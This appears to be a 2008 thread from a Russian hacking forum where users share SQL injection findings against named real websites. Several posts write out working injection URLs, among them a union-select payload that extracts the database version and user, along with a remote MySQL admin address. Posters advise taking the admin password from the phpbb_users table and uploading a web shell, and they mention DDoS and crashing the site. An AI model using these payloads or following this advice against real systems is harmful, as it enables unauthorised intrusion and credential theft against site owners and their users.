 |
|
12.08.2008, 11:10
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется...
А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?
|
|
|
12.08.2008, 11:32
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекции НЕТ!
есть:
http://www.litprom.ru/text.phtml?storycode=1'
но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
логическая ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом
|
|
|
|
12.08.2008, 12:01
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?
|
|
|
|
12.08.2008, 12:23
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php
|
|
|
|
12.08.2008, 12:25
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
superboys, прав не хватит на чтение mysql.user
|
|
|
|
12.08.2008, 12:27
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
это в каком сообщение 1 или 2?)
|
|
|
|
12.08.2008, 12:33
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Ко второму.
К первому нужны права на чтение файлов.
|
|
|
|
12.08.2008, 12:35
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
С нами:
9618766
Репутация:
5
|
|
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
|
|
|
|
12.08.2008, 12:42
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Оставь как есть или напиши администратору о дырке.
|
|
|
|
12.08.2008, 13:49
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
Сообщение от superboys
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)
попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
это для технической информации
также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
